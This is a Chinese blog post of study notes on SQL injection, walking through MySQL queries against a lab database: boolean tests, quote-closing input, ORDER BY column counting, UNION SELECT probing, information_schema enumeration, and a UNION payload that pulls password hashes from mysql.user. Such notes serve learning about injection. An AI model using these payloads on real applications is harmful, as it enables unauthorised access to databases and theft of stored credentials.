学习笔记—Sql注入

Sql注入
当有不可信数据作为查询语句的一部分发送解释器时。攻击者的恶意数据欺骗解释器以执行计划外的命令或访问数据。
学习笔记---Sql注入

学习笔记---Sql注入
学习笔记---Sql注入
学习笔记---Sql注入
报错 每个报错都有相应的解释
show databases;
学习笔记---Sql注入
use jokedb;
学习笔记---Sql注入
show tables;
学习笔记---Sql注入
select * from users;
学习笔记---Sql注入
学习笔记---Sql注入
select * from users where id=1;
学习笔记---Sql注入
select user from users where id=1;
学习笔记---Sql注入
select user from users;
学习笔记---Sql注入
select * from users where id = 1 and 1=1;
学习笔记---Sql注入
select * from users where id = 1 and 1=2;
学习笔记---Sql注入
id=1’ and ‘1’='1 前后各缺一个与语句原本存在的单引号形成闭合

select * from users order by status;
select * from users order by ppp;
学习笔记---Sql注入
Sql报错注入判断:
select * from users order by 1;
select * from users order by 2;
select * from users order by 3;
select * from users order by 4;
select * from users order by 5;
select * from users order by 6;
select * from users order by 7;
select * from users order by 8;
select * from users order by 9;
select * from users order by 10;
学习笔记---Sql注入
学习笔记---Sql注入
学习笔记---Sql注入
学习笔记---Sql注入
联合查询:
select * from users order by 1,1,1,1,1,1;
学习笔记---Sql注入
select * from users where id = 1 union select 1,1,1,1,1,1,1;
学习笔记---Sql注入
select * from users where id = 1 union select 1,1,1,1,‘a’,1,1;
学习笔记---Sql注入
select version();
学习笔记---Sql注入
SELECT authentication_string FROM mysql.user;
学习笔记---Sql注入
学习笔记---Sql注入
select * from users where id = 1 union select 1,(SELECT authentication_string FROM mysql.user limit 0,1),1,1,1,version(),database();
学习笔记---Sql注入
学习笔记---Sql注入
select * from users where id = -1 or 1=1;
学习笔记---Sql注入
学习笔记---Sql注入
select table_schema from information_schema.tables;
学习笔记---Sql注入
select table_name from information_schema.tables where table_schema = ‘jokedb’;
学习笔记---Sql注入
**
了解更多请关注下列公众号:
学习笔记---Sql注入

相关文章:

  • 2022-12-23
  • 2021-09-29
  • 2022-01-27
  • 2022-01-07
  • 2021-12-06
  • 2021-07-03
  • 2021-05-05
  • 2021-05-27
猜你喜欢
  • 2021-06-11
  • 2022-01-11
  • 2022-12-23
  • 2021-07-28
  • 2021-09-22
  • 2022-12-23
相关资源
相似解决方案